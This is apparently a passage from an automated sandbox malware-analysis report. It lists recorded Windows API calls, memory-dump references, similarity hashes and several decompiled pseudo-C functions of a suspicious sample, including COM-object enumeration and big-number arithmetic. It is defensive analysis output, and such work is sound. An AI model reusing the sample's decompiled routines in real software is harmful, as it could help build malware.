                              • API ID: FreeHeap$CloseHandle
                              • String ID:
                              • API String ID: 1910495013-0
                              • Opcode ID: 3d1d7fdb82669b2c5e9429b480ce80081fc949e3e5682fe48363f8af0e8888bf
                              • Instruction ID: bc71697ef633386216632a13822a2bcdce5089f8b51730527492f4b1b75c9578
                              • Opcode Fuzzy Hash: 3d1d7fdb82669b2c5e9429b480ce80081fc949e3e5682fe48363f8af0e8888bf
                              • Instruction Fuzzy Hash: 4131AC70201625AFE7A59F69DEC485EFBAAFF04B003648550F289C7614C736ECA1CBD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 010449B3: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 010449CE
                                • Part of subcall function 010449B3: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 01044A1C
                                • Part of subcall function 010449B3: GetProcAddress.KERNEL32(00000000,?), ref: 01044A35
                                • Part of subcall function 010449B3: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 01044A86
                              • GetLastError.KERNEL32(?,?,?), ref: 01028319
                              • FreeLibrary.KERNEL32(?,?,?), ref: 01028381
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                              • String ID:
                              • API String ID: 1730969706-0
                              • Opcode ID: 2a0fffc928e3af0f43f77cfe2dac981ff8cd6bb8882b2c0747919f8fe05e9279
                              • Instruction ID: b3e9db43e6b2ddf9d23f2a8bce1dcdb4976a92c9fcba5744ee92e4708f061548
                              • Opcode Fuzzy Hash: 2a0fffc928e3af0f43f77cfe2dac981ff8cd6bb8882b2c0747919f8fe05e9279
                              • Instruction Fuzzy Hash: 9B71F6B5D00219EFCF10DFE9C8889AEBBF9FF48304B1485AAE555A7221D731A941CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E013E52A1(intOrPtr* __eax) {
                              				void* _v8;
                              				WCHAR* _v12;
                              				void* _v16;
                              				char _v20;
                              				void* _v24;
                              				intOrPtr _v28;
                              				void* _v32;
                              				intOrPtr _v40;
                              				short _v48;
                              				intOrPtr _v56;
                              				short _v64;
                              				intOrPtr* _t54;
                              				intOrPtr* _t56;
                              				intOrPtr _t57;
                              				intOrPtr* _t58;
                              				intOrPtr* _t60;
                              				void* _t61;
                              				intOrPtr* _t63;
                              				intOrPtr* _t65;
                              				intOrPtr* _t67;
                              				intOrPtr* _t69;
                              				intOrPtr* _t71;
                              				intOrPtr* _t74;
                              				intOrPtr* _t76;
                              				intOrPtr _t78;
                              				intOrPtr* _t82;
                              				intOrPtr* _t86;
                              				intOrPtr _t102;
                              				intOrPtr _t108;
                              				void* _t117;
                              				void* _t121;
                              				void* _t122;
                              				intOrPtr _t129;
                              
                              				_t122 = _t121 - 0x3c;
                              				_push( &_v8);
                              				_push(__eax);
                              				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                              				if(_t117 >= 0) {
                              					_t54 = _v8;
                              					_t102 =  *0x13ed2b8; // 0x26ea5a8
                              					_t5 = _t102 + 0x13ee038; // 0x3050f485
                              					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                              					_t56 = _v8;
                              					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                              					if(_t117 >= 0) {
                              						__imp__#2(0x13ec2b0);
                              						_v28 = _t57;
                              						if(_t57 == 0) {
                              							_t117 = 0x8007000e;
                              						} else {
                              							_t60 = _v32;
                              							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                              							_t86 = __imp__#6;
                              							_t117 = _t61;
                              							if(_t117 >= 0) {
                              								_t63 = _v24;
                              								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                              								if(_t117 >= 0) {
                              									_t129 = _v20;
                              									if(_t129 != 0) {
                              										_v64 = 3;
                              										_v48 = 3;
                              										_v56 = 0;
                              										_v40 = 0;
                              										if(_t129 > 0) {
                              											while(1) {
                              												_t67 = _v24;
                              												asm("movsd");
                              												asm("movsd");
                              												asm("movsd");
                              												asm("movsd");
                              												_t122 = _t122;
                              												asm("movsd");
                              												asm("movsd");
                              												asm("movsd");
                              												asm("movsd");
                              												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                              												if(_t117 < 0) {
                              													goto L16;
                              												}
                              												_t69 = _v8;
                              												_t108 =  *0x13ed2b8; // 0x26ea5a8
                              												_t28 = _t108 + 0x13ee0bc; // 0x3050f1ff
                              												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                              												if(_t117 >= 0) {
                              													_t74 = _v16;
                              													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                              													if(_t117 >= 0 && _v12 != 0) {
                              														_t78 =  *0x13ed2b8; // 0x26ea5a8
                              														_t33 = _t78 + 0x13ee078; // 0x76006f
                              														if(lstrcmpW(_v12, _t33) == 0) {
                              															_t82 = _v16;
                              															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                              														}
                              														 *_t86(_v12);
                              													}
                              													_t76 = _v16;
                              													 *((intOrPtr*)( *_t76 + 8))(_t76);
                              												}
                              												_t71 = _v8;
                              												 *((intOrPtr*)( *_t71 + 8))(_t71);
                              												_v40 = _v40 + 1;
                              												if(_v40 < _v20) {
                              													continue;
                              												}
                              												goto L16;
                              											}
                              										}
                              									}
                              								}
                              								L16:
                              								_t65 = _v24;
                              								 *((intOrPtr*)( *_t65 + 8))(_t65);
                              							}
                              							 *_t86(_v28);
                              						}
                              						_t58 = _v32;
                              						 *((intOrPtr*)( *_t58 + 8))(_t58);
                              					}
                              				}
                              				return _t117;
                              			}
                              0x013e52a6
                              0x013e52af
                              0x013e52b0
                              0x013e52b4
                              0x013e52ba
                              0x013e52c0
                              0x013e52c9
                              0x013e52cf
                              0x013e52d9
                              0x013e52db
                              0x013e52e1
                              0x013e52e6
                              0x013e52f1
                              0x013e52f9
                              0x013e52fc
                              0x013e541f
                              0x013e5302
                              0x013e5302
                              0x013e530f
                              0x013e5315
                              0x013e531b
                              0x013e531f
                              0x013e5325
                              0x013e5332
                              0x013e5336
                              0x013e533c
                              0x013e533f
                              0x013e5345
                              0x013e534b
                              0x013e5351
                              0x013e5354
                              0x013e5357
                              0x013e535d
                              0x013e5366
                              0x013e536c
                              0x013e536d
                              0x013e5370
                              0x013e5371
                              0x013e5372
                              0x013e537a
                              0x013e537b
                              0x013e537c
                              0x013e537e
                              0x013e5382
                              0x013e5386
                              0x00000000
                              0x00000000
                              0x013e538c
                              0x013e5395
                              0x013e539b
                              0x013e53a5
                              0x013e53a9
                              0x013e53ab
                              0x013e53b8
                              0x013e53bc
                              0x013e53c4
                              0x013e53c9
                              0x013e53db
                              0x013e53dd
                              0x013e53e3
                              0x013e53e3
                              0x013e53ec
                              0x013e53ec
                              0x013e53ee
                              0x013e53f4
                              0x013e53f4
                              0x013e53f7
                              0x013e53fd
                              0x013e5400
                              0x013e5409
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e5409
                              0x013e535d
                              0x013e5357
                              0x013e533f
                              0x013e540f
                              0x013e540f
                              0x013e5415
                              0x013e5415
                              0x013e541b
                              0x013e541b
                              0x013e5424
                              0x013e542a
                              0x013e542a
                              0x013e52e6
                              0x013e5433

                              APIs
                              • SysAllocString.OLEAUT32(013EC2B0), ref: 013E52F1
                              • lstrcmpW.KERNEL32(00000000,0076006F), ref: 013E53D3
                              • SysFreeString.OLEAUT32(00000000), ref: 013E53EC
                              • SysFreeString.OLEAUT32(?), ref: 013E541B
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$Free$Alloclstrcmp
                              • String ID:
                              • API String ID: 1885612795-0
                              • Opcode ID: d8eecb978d4a43a546341aa06bf45d091d188ce8a6e4006eac60daffdd7177c4
                              • Instruction ID: a240ea6141f7d2e72a217f68c3b549ab5a28d322d41f06ceec5f3ae0c82d87bd
                              • Opcode Fuzzy Hash: d8eecb978d4a43a546341aa06bf45d091d188ce8a6e4006eac60daffdd7177c4
                              • Instruction Fuzzy Hash: 5E514D76E0061AEFCB10DFA8C4889AEBBF9EF89309B144594E915EB254D7719D01CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SysAllocString.OLEAUT32(?), ref: 013E4327
                              • SysFreeString.OLEAUT32(?), ref: 013E440A
                                • Part of subcall function 013E52A1: SysAllocString.OLEAUT32(013EC2B0), ref: 013E52F1
                              • SafeArrayDestroy.OLEAUT32(?), ref: 013E445E
                              • SysFreeString.OLEAUT32(?), ref: 013E446C
                                • Part of subcall function 013E2C14: Sleep.KERNEL32(000001F4), ref: 013E2C5C
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$AllocFree$ArrayDestroySafeSleep
                              • String ID:
                              • API String ID: 3193056040-0
                              • Opcode ID: 7198be1e6f61f845ad1e028c893b81ac60ac996e5b442935fb87ab69a4bf5ffb
                              • Instruction ID: 5d4573dea6cb0934f5a2e48edb2d945f7bb94d95eafae56983ccf280d21f6d88
                              • Opcode Fuzzy Hash: 7198be1e6f61f845ad1e028c893b81ac60ac996e5b442935fb87ab69a4bf5ffb
                              • Instruction Fuzzy Hash: 61510F35A0021AEFDB10DFA8D88889EBBF6FF88304B148868E615EB254D771AD45CF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 01043D87
                              • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 01043D9D
                              • memset.NTDLL ref: 01043E46
                              • memset.NTDLL ref: 01043E5C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset$_allmul_aulldiv
                              • String ID:
                              • API String ID: 3041852380-0
                              • Opcode ID: 34336076ee0126ae28bc418c981312c9d0c7431971293146a0597ec7e91fe448
                              • Instruction ID: 2a2e81d9b3bfabe7a85b0a7614d12d756fc3c5a4936671c717af444819dec8c4
                              • Opcode Fuzzy Hash: 34336076ee0126ae28bc418c981312c9d0c7431971293146a0597ec7e91fe448
                              • Instruction Fuzzy Hash: 3841A47160022AAFDB20AF68DC80BDE7775EF55710F104579F985AB180DB70AE54CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E013E2698(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                              				intOrPtr _v8;
                              				intOrPtr _v12;
                              				signed int _v16;
                              				void _v156;
                              				void _v428;
                              				void* _t55;
                              				unsigned int _t56;
                              				signed int _t66;
                              				signed int _t74;
                              				void* _t76;
                              				signed int _t79;
                              				void* _t81;
                              				void* _t92;
                              				void* _t96;
                              				signed int* _t99;
                              				signed int _t101;
                              				signed int _t103;
                              				void* _t107;
                              
                              				_t92 = _a12;
                              				_t101 = __eax;
                              				_t55 = E013E455D(_a16, _t92);
                              				_t79 = _t55;
                              				if(_t79 == 0) {
                              					L18:
                              					return _t55;
                              				}
                              				_t56 =  *(_t92 + _t79 * 4 - 4);
                              				_t81 = 0;
                              				_t96 = 0x20;
                              				if(_t56 == 0) {
                              					L4:
                              					_t97 = _t96 - _t81;
                              					_v12 = _t96 - _t81;
                              					E013E6CD0(_t79,  &_v428);
                              					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E013E21F3(_t101,  &_v428, _a8, _t96 - _t81);
                              					E013E21F3(_t79,  &_v156, _a12, _t97);
                              					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                              					_t66 = E013E6CD0(_t101, 0x13ed168);
                              					_t103 = _t101 - _t79;
                              					_a8 = _t103;
                              					if(_t103 < 0) {
                              						L17:
                              						E013E6CD0(_a16, _a4);
                              						E013E3213(_t79,  &_v428, _a4, _t97);
                              						memset( &_v428, 0, 0x10c);
                              						_t55 = memset( &_v156, 0, 0x84);
                              						goto L18;
                              					}
                              					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                              					do {
                              						if(_v8 != 0xffffffff) {
                              							_push(1);
                              							_push(0);
                              							_push(0);
                              							_push( *_t99);
                              							L013EB030();
                              							_t74 = _t66 +  *(_t99 - 4);
                              							asm("adc edx, esi");
                              							_push(0);
                              							_push(_v8 + 1);
                              							_push(_t92);
                              							_push(_t74);
                              							L013EB02A();
                              							if(_t92 > 0 || _t74 > 0xffffffff) {
                              								_t74 = _t74 | 0xffffffff;
                              								_v16 = _v16 & 0x00000000;
                              							}
                              						} else {
                              							_t74 =  *_t99;
                              						}
                              						_t106 = _t107 + _a8 * 4 - 0x1a8;
                              						_a12 = _t74;
                              						_t76 = E013E3CAA(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                              						while(1) {
                              							 *_t99 =  *_t99 - _t76;
                              							if( *_t99 != 0) {
                              								goto L14;
                              							}
                              							L13:
                              							_t92 =  &_v156;
                              							if(E013E675C(_t79, _t92, _t106) < 0) {
                              								break;
                              							}
                              							L14:
                              							_a12 = _a12 + 1;
                              							_t76 = E013E9089(_t79,  &_v156, _t106, _t106);
                              							 *_t99 =  *_t99 - _t76;
                              							if( *_t99 != 0) {
                              								goto L14;
                              							}
                              							goto L13;
                              						}
                              						_a8 = _a8 - 1;
                              						_t66 = _a12;
                              						_t99 = _t99 - 4;
                              						 *(0x13ed168 + _a8 * 4) = _t66;
                              					} while (_a8 >= 0);
                              					_t97 = _v12;
                              					goto L17;
                              				}
                              				while(_t81 < _t96) {
                              					_t81 = _t81 + 1;
                              					_t56 = _t56 >> 1;
                              					if(_t56 != 0) {
                              						continue;
                              					}
                              					goto L4;
                              				}
                              				goto L4;
                              			}
                              0x013e269b
                              0x013e26a7
                              0x013e26ad
                              0x013e26b2
                              0x013e26b6
                              0x013e2828
                              0x013e282c
                              0x013e282c
                              0x013e26bc
                              0x013e26c0
                              0x013e26c6
                              0x013e26c7
                              0x013e26d2
                              0x013e26d8
                              0x013e26dd
                              0x013e26e0
                              0x013e26fa
                              0x013e2709
                              0x013e2715
                              0x013e271f
                              0x013e2724
                              0x013e2726
                              0x013e2729
                              0x013e27e0
                              0x013e27e6
                              0x013e27f7
                              0x013e280a
                              0x013e2820
                              0x00000000
                              0x013e2825
                              0x013e2732
                              0x013e2739
                              0x013e273d
                              0x013e2743
                              0x013e2745
                              0x013e2747
                              0x013e2749
                              0x013e274b
                              0x013e2755
                              0x013e275a
                              0x013e275c
                              0x013e275e
                              0x013e275f
                              0x013e2760
                              0x013e2761
                              0x013e2768
                              0x013e276f
                              0x013e2772
                              0x013e2772
                              0x013e273f
                              0x013e273f
                              0x013e273f
                              0x013e277a
                              0x013e2782
                              0x013e278e
                              0x013e2793
                              0x013e2793
                              0x013e2798
                              0x00000000
                              0x00000000
                              0x013e279a
                              0x013e279d
                              0x013e27aa
                              0x00000000
                              0x00000000
                              0x013e27ac
                              0x013e27ac
                              0x013e27b9
                              0x013e2793
                              0x013e2798
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e2798
                              0x013e27c3
                              0x013e27c6
                              0x013e27c9
                              0x013e27d0
                              0x013e27d0
                              0x013e27dd
                              0x00000000
                              0x013e27dd
                              0x013e26c9
                              0x013e26cd
                              0x013e26ce
                              0x013e26d0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e26d0
                              0x00000000

                              APIs
                              • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 013E274B
                              • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 013E2761
                              • memset.NTDLL ref: 013E280A
                              • memset.NTDLL ref: 013E2820
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: memset$_allmul_aulldiv
                              • String ID:
                              • API String ID: 3041852380-0
                              • Opcode ID: e40b76843f74921440fe126e5a6c4c56754040b1fb0379038aaf4928c9d623c4
                              • Instruction ID: 05dd4b9ae7dcee21a5d62863d0bf08548410d64feffd304cc5c07d829c041a91
                              • Opcode Fuzzy Hash: e40b76843f74921440fe126e5a6c4c56754040b1fb0379038aaf4928c9d623c4
                              • Instruction Fuzzy Hash: CC419171A0032AAFDB109F6CCC48BEF77A9EF55318F004569E919A72C1DB70AE548B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,0103F2F3,?,?,?,?,?,00000001), ref: 0103C7CD
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0103F2F3,?,?,?,?,?,00000001), ref: 0103C7ED
                                • Part of subcall function 01024AFE: wcstombs.NTDLL ref: 01024BBC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLastObjectSingleWaitwcstombs
                              • String ID:
                              • API String ID: 2344289193-0
                              • Opcode ID: b240ef31dc1f06a6cca48700f1bc9153d1f6105837448aef1da4fb222d54e68c
                              • Instruction ID: 8f78a5968c12acde92106397c2569be3b9eea5a588562511e4e7af1521f1d6ce
                              • Opcode Fuzzy Hash: b240ef31dc1f06a6cca48700f1bc9153d1f6105837448aef1da4fb222d54e68c
                              • Instruction Fuzzy Hash: 44414CB4D00209EFEF219FA9CA885AEBBFDFB44355F1044AAE582F3141D7759A40DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrRChrA.SHLWAPI(?,00000000,00000023), ref: 0102C88D
                              • StrChrA.SHLWAPI(?,0000005C), ref: 0102C8B4
                              • lstrcpyn.KERNEL32(?,?,00000001,00000001), ref: 0102C8DA
                              • lstrcpy.KERNEL32(?,?), ref: 0102C97E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrcpylstrcpyn
                              • String ID:
                              • API String ID: 4154805583-0
                              • Opcode ID: 4037df7399236e32e96da7eba1ef69c531e40b649f6b3bc5909905f69a3f0c31
                              • Instruction ID: bfb2c9c5f77665690925173b290d9e05c6e6653570710841dcebbc1018d3809b
                              • Opcode Fuzzy Hash: 4037df7399236e32e96da7eba1ef69c531e40b649f6b3bc5909905f69a3f0c31
                              • Instruction Fuzzy Hash: BE415DB6900119BFEB11DFA8DE84DEEBBFCAB09350F0481A6F981E3145D6349A44CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: _strupr
                              • String ID:
                              • API String ID: 3408778250-0
                              • Opcode ID: 25b787c4ed6483c25c09c79529d94e131e6b19b6241aea9c9f1a4b45430ee269
                              • Instruction ID: 1a2aaeea7fa5a05d2a6b65632f19847f0285494901736aae2c073575828eac87
                              • Opcode Fuzzy Hash: 25b787c4ed6483c25c09c79529d94e131e6b19b6241aea9c9f1a4b45430ee269
                              • Instruction Fuzzy Hash: D141527180020AAFDF20DF68D888AEEB7F9EF58340F104566E9A5D7154EB38E945CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01036A98: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 01036AA6
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01026CF8
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 01026D47
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,010223FB,00000000,010223FC,00000080,00000000,00000000,01048BAA,747869A0,010223FB,?), ref: 01026DDA
                                • Part of subcall function 01026D99: GetLastError.KERNEL32 ref: 01026DE4
                                • Part of subcall function 01026D99: WaitForSingleObject.KERNEL32(000000C8), ref: 01026E09
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 01026E2A
                                • Part of subcall function 01026D99: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 01026E52
                                • Part of subcall function 01026D99: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 01026E67
                                • Part of subcall function 01026D99: SetEndOfFile.KERNEL32(00000001), ref: 01026E74
                                • Part of subcall function 01026D99: CloseHandle.KERNEL32(00000001), ref: 01026E8C
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 01026D7C
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 01026D8C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                              • String ID:
                              • API String ID: 4200334623-0
                              • Opcode ID: 8939dc51b7285ab628b3ea314bb4f33cfb991cccfaef11dfb366a8a56489a11e
                              • Instruction ID: 2563e5f3dfbf53288f2227734598ef6f2ffde30ca1747e747a1090b9e5bf8178
                              • Opcode Fuzzy Hash: 8939dc51b7285ab628b3ea314bb4f33cfb991cccfaef11dfb366a8a56489a11e
                              • Instruction Fuzzy Hash: 4A311AB9900119FFEB109FA8CD88DAEBBBDFB08344B104065F641D3124D776AE51DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TlsGetValue.KERNEL32(?), ref: 01021C32
                              • SetEvent.KERNEL32(?), ref: 01021C7C
                              • TlsSetValue.KERNEL32(00000001), ref: 01021CB6
                              • TlsSetValue.KERNEL32(00000000), ref: 01021CD2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Value$Event
                              • String ID:
                              • API String ID: 3803239005-0
                              • Opcode ID: 10c2979063b4bfd169fa546f3aba328045e3bbfade38b39ba32db0b2bd97d307
                              • Instruction ID: ed76903785a165f90922e4a0e225fb7f51a06f38cf69ac6e21766ac3cf816b96
                              • Opcode Fuzzy Hash: 10c2979063b4bfd169fa546f3aba328045e3bbfade38b39ba32db0b2bd97d307
                              • Instruction Fuzzy Hash: 8621DE75200228EFEB729F29DD809AE7BE6FF51350B244429F582CB1A4D372EC51CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0103BC6B
                              • memcpy.NTDLL(00000018,?,?), ref: 0103BC94
                              • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000A97F,00000000,000000FF,00000008), ref: 0103BCD3
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0103BCE6
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                              • String ID:
                              • API String ID: 2780211928-0
                              • Opcode ID: 68e786898ac14eabf55dad9d78433a4c39152f2c004ac8515b6c38227eb92926
                              • Instruction ID: f4ae208b2bbc996cab3cac13fdb39de959c8c698a8b92e325869a9e37a8c88fe
                              • Opcode Fuzzy Hash: 68e786898ac14eabf55dad9d78433a4c39152f2c004ac8515b6c38227eb92926
                              • Instruction Fuzzy Hash: 31318C7420020AEFDB718F19DD84E9A7BADFF44725F004129F9A6D62A4DB75D811CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01045371: memcpy.NTDLL(00000000,00000110,04B38560,04B38560,00000001,00000000), ref: 010453AD
                                • Part of subcall function 01045371: memset.NTDLL ref: 0104542E
                                • Part of subcall function 01045371: memset.NTDLL ref: 01045443
                              • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 010429A7
                              • lstrcmpi.KERNEL32(00000000,?), ref: 010429CE
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01042A13
                              • HeapFree.KERNEL32(00000000,?,?,?,?,04B38560,00000001,00000000), ref: 01042A24
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                              • String ID:
                              • API String ID: 1065503980-0
                              • Opcode ID: c093036f97edf2b447a50d71eb96a5103d47500acd8b3349b641a0c82ddaf074
                              • Instruction ID: 752bee96242414b1b1506bdfee5aed1fe45f7b5bc8771ad25d29bd6f4747c2a2
                              • Opcode Fuzzy Hash: c093036f97edf2b447a50d71eb96a5103d47500acd8b3349b641a0c82ddaf074
                              • Instruction Fuzzy Hash: 7D217EB5A0020AFFDF219FA5ED84AAE7BB9EF44354F004065F985E7128D7359D24CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                               C-Code - Quality: 78%
                               			// Decompiler output (comments added). Calls through a COM-style vtable:
                               			// the method at vtable offset 0x24 returns an HRESULT and an object in _v12,
                               			// the method at offset 0x100 on that object returns a wide string in _v16,
                               			// and the method at offset 8 is IUnknown::Release. The string is copied into
                               			// a freshly allocated buffer returned via _a4; its byte length goes to _a8.
                               			E013E7796(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                               				intOrPtr _v8;
                               				void* _v12;
                               				void* _v16;
                               				intOrPtr _t26;
                               				intOrPtr* _t28;
                               				intOrPtr _t31;
                               				intOrPtr* _t32;
                               				void* _t39;
                               				int _t46;
                               				intOrPtr* _t47;
                               				int _t48;
                               
                               				_t47 = __eax;
                               				_push( &_v12);
                               				_push(__eax);
                               				_t39 = 0;
                               				_t46 = 0;
                               				_t26 =  *((intOrPtr*)( *__eax + 0x24))();	// this->vtbl[0x24/4](this, &_v12)
                               				_v8 = _t26;
                               				if(_t26 < 0) {
                               					L13:
                               					return _v8;
                               				}
                               				if(_v12 == 0) {
                               					Sleep(0xc8);	// 200 ms, then retry the same call once
                               					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                               				}
                               				if(_v8 >= _t39) {
                               					_t28 = _v12;
                               					if(_t28 != 0) {
                               						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);	// fetch wide string
                               						_v8 = _t31;
                               						if(_t31 >= 0) {
                               							_t46 = lstrlenW(_v16);
                               							if(_t46 != 0) {
                               								_t46 = _t46 + 1;	// include terminator
                               								_t48 = _t46 + _t46;	// byte size of WCHAR buffer
                               								_t39 = E013E55DC(_t48);	// allocation helper; 0 on failure
                               								if(_t39 == 0) {
                               									_v8 = 0x8007000e;	// E_OUTOFMEMORY
                               								} else {
                               									memcpy(_t39, _v16, _t48);
                               								}
                               								__imp__#6(_v16);	// OleAut32 ordinal 6: SysFreeString
                               							}
                               						}
                               						_t32 = _v12;
                               						 *((intOrPtr*)( *_t32 + 8))(_t32);	// IUnknown::Release
                               					}
                               					 *_a4 = _t39;
                               					 *_a8 = _t46 + _t46;
                               				}
                               				goto L13;
                               			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                               • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                               • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                               • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                               • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FreeSleepStringlstrlenmemcpy
                              • String ID:
                              • API String ID: 1198164300-0
                              • Opcode ID: 57e04c2c98435b01b4eabae0a012a88a6594e35dbd480b29ec65cba0609ca560
                              • Instruction ID: 12b8ef4a4e3d39f55735cba47519f3c04f2b90f90234273e4e477a14a399c618
                              • Opcode Fuzzy Hash: 57e04c2c98435b01b4eabae0a012a88a6594e35dbd480b29ec65cba0609ca560
                              • Instruction Fuzzy Hash: 0C213E75900319EFDB11DFA8D88899EBFF8EF59315B104169E905E7240E770DA01CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0102EF00
                              • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 0102EF44
